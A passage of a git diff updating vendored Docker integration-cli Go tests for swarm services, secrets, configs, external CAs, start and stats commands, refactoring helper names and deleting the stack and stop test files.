"test", "--label-rm", "foo") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 0) c.Assert(service.Spec.Labels["foo"], checker.Equals, "") // now make sure we can add again - out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo=bar") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 1) c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") } @@ -90,21 +55,21 @@ func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) { func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { d := s.AddDaemon(c, true, true) testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: testName, }, - []byte("TESTINGDATA"), + Data: []byte("TESTINGDATA"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) testTarget := "testing" serviceName := "test" - out, err := d.Cmd("service", "create", "--name", serviceName, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) // add secret - out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + out, err = d.Cmd("service", "update", "--detach", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -119,7 +84,7 @@ func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { c.Assert(refs[0].File.Name, checker.Equals, testTarget) // remove - out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-rm", testName) + out, err = d.Cmd("service", "update", "--detach", "test", "--secret-rm", testName) c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -128,3 +93,45 @@ func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) c.Assert(refs, checker.HasLen, 0) } + +func (s *DockerSwarmSuite) TestServiceUpdateConfigs(c *check.C) { + d := s.AddDaemon(c, true, true) + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + testTarget := "/testing" + serviceName := "test" + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // add config + out, err = d.Cmd("service", "update", "--detach", "test", "--config-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].ConfigName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testTarget) + + // remove + out, err = d.Cmd("service", "update", "--detach", "test", "--config-rm", testName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 0) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go index fb896d52d5..f50b5bbf6d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go @@ -16,7 +16,7 @@ import ( func (s *DockerSuite) TestClientSetsTLSServerName(c *check.C) { c.Skip("Flakey test") // there may be more than one hit to the server for each registry request - serverNameReceived := []string{} + var serverNameReceived []string var serverName string virtualHostServer := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go deleted file mode 100644 index fd9b15449d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go +++ /dev/null @@ -1,186 +0,0 @@ -package main - -import ( - "encoding/json" - "io/ioutil" - "os" - "sort" - "strings" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSwarmSuite) TestStackRemoveUnknown(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackArgs := append([]string{"stack", "remove", "UNKNOWN_STACK"}) - - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") -} - -func (s *DockerSwarmSuite) TestStackPSUnknown(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackArgs := append([]string{"stack", "ps", "UNKNOWN_STACK"}) - - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") -} - -func (s *DockerSwarmSuite) TestStackServicesUnknown(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackArgs := append([]string{"stack", "services", "UNKNOWN_STACK"}) - - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") -} - -func (s *DockerSwarmSuite) TestStackDeployComposeFile(c *check.C) { - d := s.AddDaemon(c, true, true) - - testStackName := "testdeploy" - stackArgs := []string{ - "stack", "deploy", - "--compose-file", "fixtures/deploy/default.yaml", - testStackName, - } - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - out, err = d.Cmd("stack", "ls") - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n"+"testdeploy 2\n") - - out, err = d.Cmd("stack", "rm", testStackName) - c.Assert(err, checker.IsNil) - out, err = d.Cmd("stack", "ls") - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n") -} - -func (s *DockerSwarmSuite) TestStackDeployWithSecretsTwice(c *check.C) { - d := s.AddDaemon(c, true, true) - - out, err := d.Cmd("secret", "create", "outside", "fixtures/secrets/default") - c.Assert(err, checker.IsNil, check.Commentf(out)) - - testStackName := "testdeploy" - stackArgs := []string{ - "stack", "deploy", - "--compose-file", "fixtures/deploy/secrets.yaml", - testStackName, - } - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", "testdeploy_web") - c.Assert(err, checker.IsNil) - - var refs []swarm.SecretReference - c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) - c.Assert(refs, checker.HasLen, 3) - - sort.Sort(sortSecrets(refs)) - c.Assert(refs[0].SecretName, checker.Equals, "outside") - c.Assert(refs[1].SecretName, checker.Equals, "testdeploy_special") - c.Assert(refs[1].File.Name, checker.Equals, "special") - c.Assert(refs[2].SecretName, checker.Equals, "testdeploy_super") - c.Assert(refs[2].File.Name, checker.Equals, "foo.txt") - c.Assert(refs[2].File.Mode, checker.Equals, os.FileMode(0400)) - - // Deploy again to ensure there are no errors when secret hasn't changed - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil, check.Commentf(out)) -} - -func (s *DockerSwarmSuite) TestStackRemove(c *check.C) { - d := s.AddDaemon(c, true, true) - - stackName := "testdeploy" - stackArgs := []string{ - "stack", "deploy", - "--compose-file", "fixtures/deploy/remove.yaml", - stackName, - } - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - out, err = d.Cmd("stack", "ps", stackName) - c.Assert(err, checker.IsNil) - c.Assert(strings.Split(strings.TrimSpace(out), "\n"), checker.HasLen, 2) - - out, err = d.Cmd("stack", "rm", stackName) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Removing service testdeploy_web") - c.Assert(out, checker.Contains, "Removing network testdeploy_default") - c.Assert(out, checker.Contains, "Removing secret testdeploy_special") -} - -type sortSecrets []swarm.SecretReference - -func (s sortSecrets) Len() int { return len(s) } -func (s sortSecrets) Swap(i, j int) { s[i], s[j] = s[j], s[i] } -func (s sortSecrets) Less(i, j int) bool { return s[i].SecretName < s[j].SecretName } - -// testDAB is the DAB JSON used for testing. -// TODO: Use template/text and substitute "Image" with the result of -// `docker inspect --format '{{index .RepoDigests 0}}' busybox:latest` -const testDAB = `{ - "Version": "0.1", - "Services": { - "srv1": { - "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", - "Command": ["top"] - }, - "srv2": { - "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", - "Command": ["tail"], - "Args": ["-f", "/dev/null"] - } - } -}` - -func (s *DockerSwarmSuite) TestStackDeployWithDAB(c *check.C) { - testRequires(c, ExperimentalDaemon) - // setup - testStackName := "test" - testDABFileName := testStackName + ".dab" - defer os.RemoveAll(testDABFileName) - err := ioutil.WriteFile(testDABFileName, []byte(testDAB), 0444) - c.Assert(err, checker.IsNil) - d := s.AddDaemon(c, true, true) - // deploy - stackArgs := []string{ - "stack", "deploy", - "--bundle-file", testDABFileName, - testStackName, - } - out, err := d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Loading bundle from test.dab\n") - c.Assert(out, checker.Contains, "Creating service test_srv1\n") - c.Assert(out, checker.Contains, "Creating service test_srv2\n") - // ls - stackArgs = []string{"stack", "ls"} - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n"+"test 2\n") - // rm - stackArgs = []string{"stack", "rm", testStackName} - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Removing service test_srv1\n") - c.Assert(out, checker.Contains, "Removing service test_srv2\n") - // ls (empty) - stackArgs = []string{"stack", "ls"} - out, err = d.Cmd(stackArgs...) - c.Assert(err, checker.IsNil) - c.Assert(out, check.Equals, "NAME SERVICES\n") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go index b1cea35872..cbe917bf4f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go @@ -2,12 +2,13 @@ package main import ( "fmt" - "os/exec" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" + "gotest.tools/icmd" ) // Regression test for https://github.com/docker/docker/issues/7843 @@ -42,18 +43,15 @@ func (s *DockerSuite) TestStartAttachReturnsOnError(c *check.C) { // gh#8555: Exit code should be passed through when using start -a func (s *DockerSuite) TestStartAttachCorrectExitCode(c *check.C) { testRequires(c, DaemonIsLinux) - out, _, _ := dockerCmdWithStdoutStderr(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1") + out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1").Stdout() out = strings.TrimSpace(out) // make sure the container has exited before trying the "start -a" - dockerCmd(c, "wait", out) - - startOut, exitCode, err := dockerCmdWithError("start", "-a", out) - // start command should fail - c.Assert(err, checker.NotNil, check.Commentf("startOut: %s", startOut)) - // start -a did not respond with proper exit code - c.Assert(exitCode, checker.Equals, 1, check.Commentf("startOut: %s", startOut)) + cli.DockerCmd(c, "wait", out) + cli.Docker(cli.Args("start", "-a", out)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) } func (s *DockerSuite) TestStartAttachSilent(c *check.C) { @@ -96,7 +94,6 @@ func (s *DockerSuite) TestStartRecordError(c *check.C) { func (s *DockerSuite) TestStartPausedContainer(c *check.C) { // Windows does not support pausing containers testRequires(c, IsPausable) - defer unpauseAllContainers() runSleepingContainer(c, "-d", "--name", "testing") @@ -106,7 +103,7 @@ func (s *DockerSuite) TestStartPausedContainer(c *check.C) { // an error should have been shown that you cannot start paused container c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) // an error should have been shown that you cannot start paused container - c.Assert(out, checker.Contains, "Cannot start a paused container, try unpause instead.") + c.Assert(strings.ToLower(out), checker.Contains, "cannot start a paused container, try unpause instead") } func (s *DockerSuite) TestStartMultipleContainers(c *check.C) { @@ -162,7 +159,7 @@ func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) { // err shouldn't be nil because start will fail c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) // output does not correspond to what was expected - c.Assert(out, checker.Contains, "You cannot start and attach multiple containers at once.") + c.Assert(out, checker.Contains, "you cannot start and attach multiple containers at once") } // confirm the state of all the containers be stopped @@ -176,14 +173,17 @@ func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) { // Test case for #23716 func (s *DockerSuite) TestStartAttachWithRename(c *check.C) { testRequires(c, DaemonIsLinux) - dockerCmd(c, "create", "-t", "--name", "before", "busybox") + cli.DockerCmd(c, "create", "-t", "--name", "before", "busybox") go func() { - c.Assert(waitRun("before"), checker.IsNil) - dockerCmd(c, "rename", "before", "after") - dockerCmd(c, "stop", "--time=2", "after") + cli.WaitRun(c, "before") + cli.DockerCmd(c, "rename", "before", "after") + cli.DockerCmd(c, "stop", "--time=2", "after") }() - _, stderr, _, _ := runCommandWithStdoutStderr(exec.Command(dockerBinary, "start", "-a", "before")) - c.Assert(stderr, checker.Not(checker.Contains), "No such container") + // FIXME(vdemeester) the intent is not clear and potentially racey + result := cli.Docker(cli.Args("start", "-a", "before")).Assert(c, icmd.Expected{ + ExitCode: 137, + }) + c.Assert(result.Stderr(), checker.Not(checker.Contains), "No such container") } func (s *DockerSuite) TestStartReturnCorrectExitCode(c *check.C) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go index 5cb1a3ea02..454836367f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go @@ -7,7 +7,8 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" ) @@ -33,7 +34,7 @@ func (s *DockerSuite) TestStatsNoStream(c *check.C) { select { case outerr := <-ch: c.Assert(outerr.err, checker.IsNil, check.Commentf("Error running stats: %v", outerr.err)) - c.Assert(string(outerr.out), checker.Contains, id) //running container wasn't present in output + c.Assert(string(outerr.out), checker.Contains, id[:12]) //running container wasn't present in output case <-time.After(3 * time.Second): statsCmd.Process.Kill() c.Fatalf("stats did not return immediately when not streaming") @@ -130,6 +131,7 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) { stdout, err := statsCmd.StdoutPipe() c.Assert(err, check.IsNil) c.Assert(statsCmd.Start(), check.IsNil) + go statsCmd.Wait() defer statsCmd.Process.Kill() go func() { @@ -146,7 +148,7 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) { } }() - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) id <- strings.TrimSpace(out)[:12] @@ -157,3 +159,22 @@ func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) { // ignore, done } } + +func (s *DockerSuite) TestStatsFormatAll(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + cli.DockerCmd(c, "run", "-d", "--name=RunningOne", "busybox", "top") + cli.WaitRun(c, "RunningOne") + cli.DockerCmd(c, "run", "-d", "--name=ExitedOne", "busybox", "top") + cli.DockerCmd(c, "stop", "ExitedOne") + cli.WaitExited(c, "ExitedOne", 5*time.Second) + + out := cli.DockerCmd(c, "stats", "--no-stream", "--format", "{{.Name}}").Combined() + c.Assert(out, checker.Contains, "RunningOne") + c.Assert(out, checker.Not(checker.Contains), "ExitedOne") + + out = cli.DockerCmd(c, "stats", "--all", "--no-stream", "--format", "{{.Name}}").Combined() + c.Assert(out, checker.Contains, "RunningOne") + c.Assert(out, checker.Contains, "ExitedOne") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go deleted file mode 100644 index 103d01374c..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go +++ /dev/null @@ -1,17 +0,0 @@ -package main - -import ( - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestStopContainerWithRestartPolicyAlways(c *check.C) { - dockerCmd(c, "run", "--name", "verifyRestart1", "-d", "--restart=always", "busybox", "false") - dockerCmd(c, "run", "--name", "verifyRestart2", "-d", "--restart=always", "busybox", "false") - - c.Assert(waitRun("verifyRestart1"), checker.IsNil) - c.Assert(waitRun("verifyRestart2"), checker.IsNil) - - dockerCmd(c, "stop", "verifyRestart1") - dockerCmd(c, "stop", "verifyRestart2") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go index 8eae162cba..057c0d94c8 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go @@ -4,7 +4,9 @@ package main import ( "bytes" + "context" "encoding/json" + "encoding/pem" "fmt" "io/ioutil" "net/http" @@ -14,20 +16,27 @@ import ( "strings" "time" + "github.com/cloudflare/cfssl/helpers" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" "github.com/docker/libnetwork/driverapi" "github.com/docker/libnetwork/ipamapi" remoteipam "github.com/docker/libnetwork/ipams/remote/api" + "github.com/docker/swarmkit/ca/keyutils" "github.com/go-check/check" "github.com/vishvananda/netlink" + "gotest.tools/fs" + "gotest.tools/icmd" ) func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) { d := s.AddDaemon(c, true, true) getSpec := func() swarm.Spec { - sw := d.getSwarm(c) + sw := d.GetSwarm(c) return sw.Spec } @@ -44,27 +53,70 @@ func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) { c.Assert(out, checker.Contains, "minimum certificate expiry time") spec = getSpec() c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) + + // passing an external CA (this is without starting a root rotation) does not fail + cli.Docker(cli.Args("swarm", "update", "--external-ca", "protocol=cfssl,url=https://something.org", + "--external-ca", "protocol=cfssl,url=https://somethingelse.org,cacert=fixtures/https/ca.pem"), + cli.Daemon(d)).Assert(c, icmd.Success) + + expected, err := ioutil.ReadFile("fixtures/https/ca.pem") + c.Assert(err, checker.IsNil) + + spec = getSpec() + c.Assert(spec.CAConfig.ExternalCAs, checker.HasLen, 2) + c.Assert(spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "") + c.Assert(spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, string(expected)) + + // passing an invalid external CA fails + tempFile := fs.NewFile(c, "testfile", fs.WithContent("fakecert")) + defer tempFile.Remove() + + result := cli.Docker(cli.Args("swarm", "update", + "--external-ca", fmt.Sprintf("protocol=cfssl,url=https://something.org,cacert=%s", tempFile.Path())), + cli.Daemon(d)) + result.Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "must be in PEM format", + }) } func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) { d := s.AddDaemon(c, false, false) getSpec := func() swarm.Spec { - sw := d.getSwarm(c) + sw := d.GetSwarm(c) return sw.Spec } - out, err := d.Cmd("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + // passing an invalid external CA fails + tempFile := fs.NewFile(c, "testfile", fs.WithContent("fakecert")) + defer tempFile.Remove() + + result := cli.Docker(cli.Args("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s", + "--external-ca", fmt.Sprintf("protocol=cfssl,url=https://somethingelse.org,cacert=%s", tempFile.Path())), + cli.Daemon(d)) + result.Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "must be in PEM format", + }) + + cli.Docker(cli.Args("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s", + "--external-ca", "protocol=cfssl,url=https://something.org", + "--external-ca", "protocol=cfssl,url=https://somethingelse.org,cacert=fixtures/https/ca.pem"), + cli.Daemon(d)).Assert(c, icmd.Success) + + expected, err := ioutil.ReadFile("fixtures/https/ca.pem") + c.Assert(err, checker.IsNil) spec := getSpec() c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second) + c.Assert(spec.CAConfig.ExternalCAs, checker.HasLen, 2) + c.Assert(spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "") + c.Assert(spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, string(expected)) - c.Assert(d.Leave(true), checker.IsNil) - time.Sleep(500 * time.Millisecond) // https://github.com/docker/swarmkit/issues/1421 - out, err = d.Cmd("swarm", "init") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(d.SwarmLeave(true), checker.IsNil) + cli.Docker(cli.Args("swarm", "init"), cli.Daemon(d)).Assert(c, icmd.Success) spec = getSpec() c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 90*24*time.Hour) @@ -74,15 +126,12 @@ func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) { func (s *DockerSwarmSuite) TestSwarmInitIPv6(c *check.C) { testRequires(c, IPv6) d1 := s.AddDaemon(c, false, false) - out, err := d1.Cmd("swarm", "init", "--listen-addr", "::1") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + cli.Docker(cli.Args("swarm", "init", "--listen-add", "::1"), cli.Daemon(d1)).Assert(c, icmd.Success) d2 := s.AddDaemon(c, false, false) - out, err = d2.Cmd("swarm", "join", "::1") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + cli.Docker(cli.Args("swarm", "join", "::1"), cli.Daemon(d2)).Assert(c, icmd.Success) - out, err = d2.Cmd("info") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + out := cli.Docker(cli.Args("info"), cli.Daemon(d2)).Assert(c, icmd.Success).Combined() c.Assert(out, checker.Contains, "Swarm: active") } @@ -96,49 +145,42 @@ func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedAdvertiseAddr(c *check.C) { func (s *DockerSwarmSuite) TestSwarmIncompatibleDaemon(c *check.C) { // init swarm mode and stop a daemon d := s.AddDaemon(c, true, true) - info, err := d.info() - c.Assert(err, checker.IsNil) + info := d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d.Stop(), checker.IsNil) + d.Stop(c) // start a daemon with --cluster-store and --cluster-advertise - err = d.Start("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375") + err := d.StartWithError("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375") c.Assert(err, checker.NotNil) - content, _ := ioutil.ReadFile(d.logFile.Name()) + content, err := d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, "--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") // start a daemon with --live-restore - err = d.Start("--live-restore") + err = d.StartWithError("--live-restore") c.Assert(err, checker.NotNil) - content, _ = ioutil.ReadFile(d.logFile.Name()) + content, err = d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, "--live-restore daemon configuration is incompatible with swarm mode") // restart for teardown - c.Assert(d.Start(), checker.IsNil) -} - -// Test case for #24090 -func (s *DockerSwarmSuite) TestSwarmNodeListHostname(c *check.C) { - d := s.AddDaemon(c, true, true) - - // The first line should contain "HOSTNAME" - out, err := d.Cmd("node", "ls") - c.Assert(err, checker.IsNil) - c.Assert(strings.Split(out, "\n")[0], checker.Contains, "HOSTNAME") + d.Start(c) } func (s *DockerSwarmSuite) TestSwarmServiceTemplatingHostname(c *check.C) { d := s.AddDaemon(c, true, true) + hostname, err := d.Cmd("node", "inspect", "--format", "{{.Description.Hostname}}", "self") + c.Assert(err, checker.IsNil, check.Commentf(hostname)) - out, err := d.Cmd("service", "create", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}-{{.Node.Hostname}}", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) - containers := d.activeContainers() + containers := d.ActiveContainers(c) out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.Hostname}}", containers[0]) c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1", check.Commentf("hostname with templating invalid")) + c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1-"+strings.Split(hostname, "\n")[0], check.Commentf("hostname with templating invalid")) } // Test case for #24270 @@ -148,15 +190,15 @@ func (s *DockerSwarmSuite) TestSwarmServiceListFilter(c *check.C) { name1 := "redis-cluster-md5" name2 := "redis-cluster" name3 := "other-cluster" - out, err := d.Cmd("service", "create", "--name", name1, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name1, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - out, err = d.Cmd("service", "create", "--name", name2, "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name2, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - out, err = d.Cmd("service", "create", "--name", name3, "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name3, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -206,12 +248,12 @@ func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) { d := s.AddDaemon(c, true, true) name := "redis-cluster-md5" - out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--replicas=3", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 3) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 3) filter := "name=redis-cluster" @@ -232,63 +274,35 @@ func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) { func (s *DockerSwarmSuite) TestSwarmPublishAdd(c *check.C) { d := s.AddDaemon(c, true, true) - testCases := []struct { - name string - publishAdd []string - ports string - }{ - { - name: "simple-syntax", - publishAdd: []string{ - "80:80", - "80:80", - "80:80", - "80:20", - }, - ports: "[{ tcp 80 80 ingress}]", - }, - { - name: "complex-syntax", - publishAdd: []string{ - "target=90,published=90,protocol=tcp,mode=ingress", - "target=90,published=90,protocol=tcp,mode=ingress", - "target=90,published=90,protocol=tcp,mode=ingress", - "target=30,published=90,protocol=tcp,mode=ingress", - }, - ports: "[{ tcp 90 90 ingress}]", - }, - } - - for _, tc := range testCases { - out, err := d.Cmd("service", "create", "--name", tc.name, "--label", "x=y", "busybox", "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + name := "top" + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--label", "x=y", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[0], tc.name) - c.Assert(err, 